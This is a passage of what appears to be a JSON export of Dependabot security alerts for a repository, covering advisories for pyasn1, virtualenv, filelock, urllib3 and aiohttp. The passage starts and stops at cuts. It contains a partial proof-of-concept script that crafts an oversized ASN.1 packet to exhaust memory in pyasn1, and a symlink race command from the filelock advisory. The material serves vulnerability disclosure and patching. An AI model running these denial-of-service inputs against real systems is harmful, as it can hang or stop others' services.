bytes([length])\nelif length < 256:\n length_bytes = b'\\x81' + length.to_bytes(1, 'big')\nelif length < 256**2:\n length_bytes = b'\\x82' + length.to_bytes(2, 'big')\nelif length < 256**3:\n length_bytes = b'\\x83' + length.to_bytes(3, 'big')\nelse:\n # 4 bytes can handle up to 4GB\n length_bytes = b'\\x84' + length.to_bytes(4, 'big')\n\n# Use OID (0x06) for more aggressive parsing\nmalicious_packet = b'\\x06' + length_bytes + payload\n\nprint(f\"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB\")\n\ntry:\n print(\"[*] Decoding (this may take time or exhaust memory)...\")\n result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())\n\n print(f'[+] Decoded successfully')\n print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')\n\n # Try to convert to string\n print('[*] Converting to string...')\n try:\n str_result = str(result[0])\n print(f'[+] String succeeded: {len(str_result)} chars')\n if len(str_result) > 10000:\n print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')\n except MemoryError:\n print(f'[-] MemoryError during string conversion!')\n except Exception as e:\n print(f'[-] {type(e).__name__} during string conversion')\n\nexcept MemoryError:\n print('[-] MemoryError: Out of memory!')\nexcept Exception as e:\n print(f'[-] Error: {type(e).__name__}: {e}')\n\n\nprint(\"\\n[*] Test completed\")\n```\n\n\nScreenshots with the results:\n\n#### DoS\n\"Screenshot_20251219_160840\"\n\n\"Screenshot_20251219_152815\"\n\n#### Leak analysis\n\nA potential heap leak was investigated but came back clean:\n```\n[*] Creating 1000KB payload...\n[*] Decoding with pyasn1...\n[*] Materializing to string...\n[+] Decoded 2157784 characters\n[+] Binary representation: 896001 bytes\n[+] Dumped to heap_dump.bin\n\n[*] First 64 bytes (hex):\n 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081\n\n[*] First 64 bytes (ASCII/hex dump):\n 0000: 01 02 04 08 10 
20 40 81 02 04 08 10 20 40 81 02 ..... @..... @..\n 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @..... @....\n 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @..... @..... \n 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @..... @..... @.\n\n[*] Digit distribution analysis:\n '0': 10.1%\n '1': 9.9%\n '2': 10.0%\n '3': 9.9%\n '4': 9.9%\n '5': 10.0%\n '6': 10.0%\n '7': 10.0%\n '8': 9.9%\n '9': 10.1%\n```\n\n### Scenario\n\n1. An attacker creates a malicious X.509 certificate.\n2. The application validates certificates.\n3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above.\n\n### Impact\n\nThis issue can affect resource consumption and hang systems or stop services.\nThis may affect:\n- LDAP servers\n- TLS/SSL endpoints\n- OCSP responders\n- etc.\n\n### Recommendation\n\nAdd a limit to the allowed bytes in the decoder.","severity":"high","identifiers":[{"value":"GHSA-63vm-454h-vhhq","type":"GHSA"},{"value":"CVE-2026-23490","type":"CVE"}],"references":[{"url":"https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq"},{"url":"https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6"},{"url":"https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496"},{"url":"https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23490"},{"url":"https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970"},{"url":"https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html"},{"url":"https://github.com/advisories/GHSA-63vm-454h-vhhq"}],"published_at":"2026-01-16T19:19:25Z","updated_at":"2026-02-01T18:30:16Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"= 
0.6.1","first_patched_version":{"identifier":"0.6.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00021,"percentile":0.05578},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"= 0.6.1","first_patched_version":{"identifier":"0.6.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/17","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/17","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":16,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"virtualenv"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-597g-3phw-6986","cve_id":"CVE-2026-22702","summary":"virtualenv Has TOCTOU Vulnerabilities in Directory Creation","description":"## Impact\n\nTOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in `virtualenv` allow local attackers to perform symlink-based attacks on directory creation operations. 
An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations.\n\n**Affected versions:** All versions up to and including 20.36.1\n\n**Affected users:** Any user running `virtualenv` on multi-user systems where untrusted local users have filesystem access to shared temporary directories or where `VIRTUALENV_OVERRIDE_APP_DATA` points to a user-writable location.\n\n**Attack scenarios:**\n- Cache poisoning: Attacker corrupts wheels or Python metadata in the cache\n- Information disclosure: Attacker reads sensitive cached data or metadata\n- Lock bypass: Attacker controls lock file semantics to cause concurrent access violations\n- Denial of service: Lock starvation preventing virtualenv operations\n\n## Patches\n\nThe vulnerability has been patched by replacing check-then-act patterns with atomic `os.makedirs(..., exist_ok=True)` operations.\n\n**Fixed in:** PR #3013\n\n**Versions with the fix:** 20.36.2 and later\n\nUsers should upgrade to version 20.36.2 or later.\n\n## Workarounds\n\nIf you cannot upgrade immediately:\n\n1. Ensure `VIRTUALENV_OVERRIDE_APP_DATA` points to a directory owned by the current user with restricted permissions (mode 0700)\n2. Avoid running `virtualenv` in shared temporary directories where other users have write access\n3. 
Use separate user accounts for different projects to isolate app_data directories\n\n## References\n\n- GitHub PR: https://github.com/pypa/virtualenv/pull/3013\n- Vulnerability reported by: @tsigouris007\n- CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (TOCTOU)\n- CWE-59: Improper Link Resolution Before File Access","severity":"medium","identifiers":[{"value":"GHSA-597g-3phw-6986","type":"GHSA"},{"value":"CVE-2026-22702","type":"CVE"}],"references":[{"url":"https://github.com/pypa/virtualenv/security/advisories/GHSA-597g-3phw-6986"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22702"},{"url":"https://github.com/pypa/virtualenv/pull/3013"},{"url":"https://github.com/pypa/virtualenv/commit/dec4cec5d16edaf83a00a658f32d1e032661cebc"},{"url":"https://github.com/advisories/GHSA-597g-3phw-6986"}],"published_at":"2026-01-13T18:45:57Z","updated_at":"2026-01-13T18:45:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"virtualenv"},"severity":"medium","vulnerable_version_range":"< 20.36.1","first_patched_version":{"identifier":"20.36.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","score":4.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00016,"percentile":0.03803},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","score":4.5},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"virtualenv"},"severity":"medium","vulnerable_version_range":"< 
20.36.1","first_patched_version":{"identifier":"20.36.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/16","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/16","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":15,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"filelock"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-qmgc-5h2g-mvrw","cve_id":"CVE-2026-22701","summary":"filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock","description":"## Vulnerability Summary\n\n**Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock\n\n**Affected Component:** `filelock` package - `SoftFileLock` class\n**File:** `src/filelock/_soft.py` lines 17-27\n**CWE:** CWE-362, CWE-367, CWE-59\n\n---\n\n## Description\n\nA TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly.\n\nThe vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service.\n\n### Attack Scenario\n\n```\n1. Lock attempts to acquire on /tmp/app.lock\n2. Permission validation passes\n3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock\n4. 
os.open() tries to create lock file\n5. Lock operates on attacker-controlled target file or fails\n```\n\n---\n\n## Impact\n\n_What kind of vulnerability is it? Who is impacted?_\n\nThis is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization.\n\n**Affected Users:**\n- Applications using `filelock.SoftFileLock` directly\n- Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy)\n\n**Consequences:**\n- **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed\n- **Denial of Service** - attacker can prevent lock file creation by maintaining symlink\n- **Resource serialization failures** - multiple processes may acquire \"locks\" simultaneously\n- **Unintended file operations** - lock could operate on attacker-controlled files\n\n**CVSS v4.0 Score:** 5.6 (Medium)\n**Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N\n\n**Attack Requirements:**\n- Local filesystem access to the directory containing lock files\n- Permission to create symlinks (standard for regular unprivileged users on Unix/Linux)\n- Ability to time the symlink creation during the narrow race window\n\n---\n\n## Patches\n\n_Has the problem been patched? 
What versions should users upgrade to?_\n\nYes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation.\n\n**Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0)\n\n**Mitigation Details:**\n- The `O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support\n- On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented\n- On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented\n\n**Users should:**\n- Upgrade to the patched version when available\n- For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock`\n\n---\n\n## Workarounds\n\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nFor users unable to update immediately:\n\n1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146)\n\n2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories:\n ```bash\n chmod 700 /path/to/lock/directory\n ```\n\n3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation\n\n4. 
**Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations\n\n---\n\n## References\n\n_Are there any links users can visit to find out more?_\n\n- **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock)\n- **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html\n- **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html\n- **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html\n- **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html\n- **GitHub Repository:** https://github.com/tox-dev/filelock\n\n---\n\n**Reported by:** George Tsigourakos (@tsigouris007)","severity":"medium","identifiers":[{"value":"GHSA-qmgc-5h2g-mvrw","type":"GHSA"},{"value":"CVE-2026-22701","type":"CVE"}],"references":[{"url":"https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22701"},{"url":"https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0"},{"url":"https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5"},{"url":"https://github.com/advisories/GHSA-qmgc-5h2g-mvrw"}],"published_at":"2026-01-13T18:44:55Z","updated_at":"2026-01-13T18:44:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.3","first_patched_version":{"identifier":"3.20.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":6.0e-05,"percentile":0.00422},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H","score":5.3},"cwes":[{"cwe_id":"CWE-59","name":"Improper 
Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"},{"cwe_id":"CWE-367","name":"Time-of-check Time-of-use (TOCTOU) Race Condition"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.3","first_patched_version":{"identifier":"3.20.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/15","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/15","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":14,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-38jv-5279-wg99","cve_id":"CVE-2026-21441","summary":"Decompression-bomb safeguards bypassed when following HTTP redirects (streaming API)","description":"### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nurllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption.\n\nHowever, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. 
This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409).\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when `preload_content=False`.\n\nIf upgrading is not immediately possible, disable [redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests) by setting `redirect=False` for requests to untrusted source.","severity":"high","identifiers":[{"value":"GHSA-38jv-5279-wg99","type":"GHSA"},{"value":"CVE-2026-21441","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99"},{"url":"https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-21441"},{"url":"https://lists.debian.org/debian-lts-announce/2026/01/msg00017.html"},{"url":"https://github.com/advisories/GHSA-38jv-5279-wg99"}],"published_at":"2026-01-07T19:18:14Z","updated_at":"2026-01-23T16:05:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.22, < 
2.6.3","first_patched_version":{"identifier":"2.6.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00032,"percentile":0.0921},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.22, < 2.6.3","first_patched_version":{"identifier":"2.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/14","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/14","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":13,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-fh55-r93g-j68g","cve_id":"CVE-2025-69230","summary":"AIOHTTP Vulnerable to Cookie Parser Warning Storm","description":"### Summary\nReading multiple invalid cookies can lead to a logging storm.\n\n### Impact\nIf the ``cookies`` attribute is accessed in an application, then an attacker may be able to trigger a storm of warning-level logs using a specially crafted Cookie header.\n\n----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326","severity":"low","identifiers":[{"value":"GHSA-fh55-r93g-j68g","type":"GHSA"},{"value":"CVE-2025-69230","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-fh55-r93g-j68g"},{"url":"https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69230"},{"url":"https://github.com/advisories/GHSA-fh55-r93g-j68g"}],"published_at":"2026-01-05T23:13:46Z","updated_at":"2026-01-06T16:07:05Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00015,"percentile":0.03409},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-779","name":"Logging of Excessive Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/13","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/13","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":12,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-g84x-mcqj-x9qq","cve_id":"CVE-2025-69229","summary":"AIOHTTP vulnerable to DoS through chunked messages","description":"### Summary\n\nHandling of chunked messages can result in excessive blocking CPU usage when receiving a large number of chunks.\n\n### Impact\n\nIf an application makes use of the `request.read()` method in an endpoint, it may be possible for an attacker to cause the server to spend a moderate amount of blocking CPU time (e.g. 1 second) while processing the request. 
This could potentially lead to DoS as the server would be unable to handle other requests during that time.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712\nPatch: https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229","severity":"medium","identifiers":[{"value":"GHSA-g84x-mcqj-x9qq","type":"GHSA"},{"value":"CVE-2025-69229","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-g84x-mcqj-x9qq"},{"url":"https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229"},{"url":"https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69229"},{"url":"https://github.com/advisories/GHSA-g84x-mcqj-x9qq"}],"published_at":"2026-01-05T23:13:29Z","updated_at":"2026-01-06T16:07:01Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00067,"percentile":0.20533},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/12","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/12","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":11,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6jhg-hg63-jvvf","cve_id":"CVE-2025-69228","summary":"AIOHTTP vulnerable to denial of service through large payloads","description":"### Summary\nA request can be crafted in such a way that an aiohttp server's memory fills up uncontrollably during processing.\n\n### Impact\nIf an application includes a handler that uses the `Request.post()` method, an attacker may be able to freeze the server by exhausting the memory.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60","severity":"medium","identifiers":[{"value":"GHSA-6jhg-hg63-jvvf","type":"GHSA"},{"value":"CVE-2025-69228","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6jhg-hg63-jvvf"},{"url":"https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69228"},{"url":"https://github.com/advisories/GHSA-6jhg-hg63-jvvf"}],"published_at":"2026-01-05T23:13:14Z","updated_at":"2026-01-08T12:17:13Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/11","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/11","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":10,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-jj3x-wxrx-4x23","cve_id":"CVE-2025-69227","summary":"AIOHTTP vulnerable to DoS when bypassing asserts","description":"### Summary\nWhen assert statements are bypassed, an infinite loop can occur, resulting in a DoS attack when processing a POST body.\n\n### Impact\nIf optimisations are enabled (`-O` or `PYTHONOPTIMIZE=1`), and the application includes a handler that uses the `Request.post()` method, then an attacker may be able to execute a DoS attack with a specially crafted message.\n\n------\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259","severity":"medium","identifiers":[{"value":"GHSA-jj3x-wxrx-4x23","type":"GHSA"},{"value":"CVE-2025-69227","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jj3x-wxrx-4x23"},{"url":"https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69227"},{"url":"https://github.com/advisories/GHSA-jj3x-wxrx-4x23"}],"published_at":"2026-01-05T23:10:15Z","updated_at":"2026-01-06T16:06:51Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-835","name":"Loop with Unreachable Exit Condition ('Infinite Loop')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/10","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/10","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":9,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-54jq-c3m8-4m76","cve_id":"CVE-2025-69226","summary":"AIOHTTP vulnerable to brute-force leak of internal static file path components","description":"### Summary\nPath normalization for static files prevents path traversal, but opens up the ability for an attacker to ascertain the\nexistence of absolute path components.\n\n### Impact\nIf an application uses `web.static()` (not recommended for production deployments), it may be possible for an attacker to ascertain the existence of path components.\n\n------\n\nPatch: 